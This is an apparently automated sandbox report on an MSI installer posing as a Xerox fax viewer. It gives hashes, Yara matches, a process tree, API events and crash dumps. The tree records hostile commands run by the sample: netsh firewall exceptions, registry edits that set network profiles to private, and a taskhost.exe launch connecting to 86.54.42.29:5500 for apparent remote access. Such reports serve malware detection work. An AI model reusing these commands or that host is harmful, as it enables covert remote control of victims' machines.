Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 21, 2025, 10:23 a.m.	April 21, 2025, 12:24 p.m.

Size	3.7MB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {F8524AC2-0165-4025-AE1F-D06E4584AF97}, Number of Words: 10, Subject: XEROX Fax & Image Manager, Author: Photo and Fax Viewer, Name of Creating Application: XEROX Fax & Image Manager (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install XEROX Fax & Image Manager. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 16 12:11:35 2025, Last Saved Time/Date: Sun Mar 16 12:11:35 2025, Last Printed: Sun Mar 16 12:11:35 2025, Number of Pages: 450
MD5	`afc28d87bbf6cb0c9018a0fb1ee216c3`
SHA256	`fb051cb45b75b12251680950d6ee85b83e9e75d849f4ca3ab3d77fe992516532`
CRC32	`785D0060`
ssdeep	`49152:1SyRRLc5kcp7yM+pFuvFG4PoS9xeXf7LKnSG5vHqU4duDfCPa3tQLtGmaG4rSEVq:3C1oUwXXM0YtQQmazSWbiG/Om`
Yara	Malicious_Library_Zero - Malicious_Library CAB_file_format - CAB archive file Microsoft_Office_File_Zero - Microsoft Office File Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

msiexec.exe "C:\Windows\System32\msiexec.exe" /I C:\Users\test22\AppData\Local\Temp\Software-MSI.msi
2592
explorer.exe C:\Windows\Explorer.EXE
1452
- viewer.exe "C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd"
  2916
- cmd.exe cmd /c ""C:\Games\cmmc.cmd" "
  3016
  - cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
    2072
  - cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    2116
    - reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      152
  - WMIC.exe wmic process where (name="taskhost.exe") get commandline
    2228
  - findstr.exe findstr /i "taskhost.exe"
    2260
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://us1.discourse-cdn.com/flex019/uploads/manager1/original/2X/4/40a86b146f0d5eca2a51907256327ed2524cdf02.png
    2612
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208
      2900
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      284
  - viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
    2776
  - timeout.exe timeout /t 1
    2876
  - taskkill.exe taskkill /im rundll32.exe /f
    2244
  - timeout.exe timeout /t 2
    2944
  - taskkill.exe taskkill /im rundll32.exe /f
    300
  - timeout.exe timeout /t 2
    1852
  - taskkill.exe taskkill /im rundll32.exe /f
    2792
  - timeout.exe timeout /t 2
    1864
- cmd.exe cmd /c ""C:\Games\c.cmd" "
  2380
  - mode.com Mode 90,20
    2084
  - cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
    2212
  - cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    1528
    - reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
      2396
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
    2184
  - cmd.exe cmd
    2288
    - mode.com Mode 90,20
      2848
    - netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
      3028
    - netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
      2392
    - WMIC.exe wmic process where (name="taskhost.exe") get commandline
      2756
    - findstr.exe findstr /i "taskhost.exe"
      2400
    - taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5533368 -connect 86.54.42.29:5500 -run
      2236
  - viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
    2268
  - timeout.exe timeout /t 20
    604
  - timeout.exe timeout /t 20
    3764
  - timeout.exe timeout /t 20
    3468
  - timeout.exe timeout /t 20
    3676
- cmd.exe cmd /c ""C:\Games\once.cmd" "
  1976

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
86.54.42.29	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 21, 2025, 10:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2025, 10:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:24 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (35 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 21, 2025, 10:23 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:23 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:24 a.m.			0	0

Command line console output was observed (50 out of 458 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: SetLocal console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: EnableExtensions DisableDelayedExpansion console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: For console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: /F console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "Delims==" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: %A In console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: ('Set GUID[ 2>Nul') Do console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "%A=" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "i=101" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: For console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: /F console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "Tokens=1,2*" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: %A In console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: ('Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description') Do console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: If console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "%~nB" NEQ "%~B" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set "GUID[%i:*1=%]=%~nB" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: rem console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: start C:\Games\viewer /HideWindow Reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\%~nB" /V Category /t REG_DWORD /d 1 /f console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Else console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call Set GUID[%i:1=%]="%%GUID[%i:1=%]%%","%C" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set/A console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: i+=1 console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: If console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "{0EB195B3-AD00-4D96-9B08-2F724C0FD164}" NEQ "NT\CurrentVersion\NetworkList\Profiles\{0EB195B3-AD00-4D96-9B08-2F724C0FD164}" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set "GUID[%i:*1=%]={0EB195B3-AD00-4D96-9B08-2F724C0FD164}" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: rem console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: start C:\Games\viewer /HideWindow Reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{0EB195B3-AD00-4D96-9B08-2F724C0FD164}" /V Category /t REG_DWORD /d 1 /f console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Else console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call Set GUID[%i:1=%]="%%GUID[%i:1=%]%%","" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Set/A console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: i+=1 console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: C:\Games> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: If console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: "REG_SZ" NEQ "REG_SZ" console_handle: 0x0000000000000007	1	1
WriteConsoleW April 21, 2025, 10:23 a.m.	buffer: Call console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2025, 10:23 a.m.		1	1	0

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ April 21, 2025, 10:23 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefd4fa49d registers.r14: 0 registers.r15: 0 registers.rcx: 43640240 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 43646192 registers.r11: 43642000 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1954437873 registers.r13: 0	1
__exception__ April 21, 2025, 10:24 a.m.	stacktrace: 0x5b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5b2e04 registers.r14: 186116528 registers.r15: 186116968 registers.rcx: 1408 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 86113632 registers.rsp: 186115704 registers.r11: 186120224 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1440 registers.r12: 33405952 registers.rbp: 186115840 registers.rdi: 33140288 registers.rax: 5975552 registers.r13: 186116400	1
__exception__ April 21, 2025, 10:24 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefd4fa49d registers.r14: 0 registers.r15: 0 registers.rcx: 49603664 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 49609616 registers.r11: 49605424 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1947452090 registers.r13: 0	1

Time & API

Arguments

Status

Return

Repeated

__exception__

April 21, 2025, 10:23 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 43640240
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 43646192
registers.r11: 43642000
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1954437873
registers.r13: 0

__exception__

April 21, 2025, 10:24 a.m.

stacktrace:

0x5b2e04
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5b2e04
registers.r14: 186116528
registers.r15: 186116968
registers.rcx: 1408
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 86113632
registers.rsp: 186115704
registers.r11: 186120224
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 1440
registers.r12: 33405952
registers.rbp: 186115840
registers.rdi: 33140288
registers.rax: 5975552
registers.r13: 186116400

__exception__

April 21, 2025, 10:24 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
